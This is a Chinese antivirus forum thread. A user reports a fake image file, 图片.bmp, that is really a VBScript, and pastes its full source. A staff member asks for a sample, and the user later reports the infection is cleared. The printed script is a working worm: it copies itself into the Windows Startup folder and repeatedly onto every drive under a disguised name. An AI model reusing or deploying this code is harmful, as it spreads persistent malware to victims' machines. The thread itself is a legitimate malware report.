瑞星卡卡安全论坛技术交流区可疑文件交流 电脑中一个名为图片.bmp的文件用瑞星杀不到

1   1  /  1  页   跳转

电脑中一个名为图片.bmp的文件用瑞星杀不到

电脑中一个名为图片.bmp的文件用瑞星杀不到

文件类型为VBScript Script File
用记事本打开,代码如下:
on error resume next
set f=createobject("scripting.filesystemobject"):fp=wscript.scriptfullname:startp="C:\Documents and Settings\All Users\「开始」菜单\程序\启动\UserInit.vbs"
f.copyfile fp,startp
do while f.fileexists(fp)
  for each d in f.drives
  if d.isready then
    f.copyfile fp,d.path+"图片.bmp.vbs"
  end if
  next
wscript.sleep 5000
loop
set w=createobject("wscript.shell")
w.run startp

用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

附件附件:

您所在的用户组无法下载或查看附件

分享到:
gototop
 

回复:电脑中一个名为图片.bmp的文件用瑞星杀不到

C:\Documents and Settings\All Users\「开始」菜单\程序\启动\UserInit.vbs  找到压缩发来。
gototop
 

回复: 电脑中一个名为图片.bmp的文件用瑞星杀不到

文件已经找到,并进行了压缩。

附件附件:

您所在的用户组无法下载或查看附件

gototop
 

回复:电脑中一个名为图片.bmp的文件用瑞星杀不到

谢谢了,源文件已经删除了,硬盘其他盘中不再出现图片.bmp.vbs。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT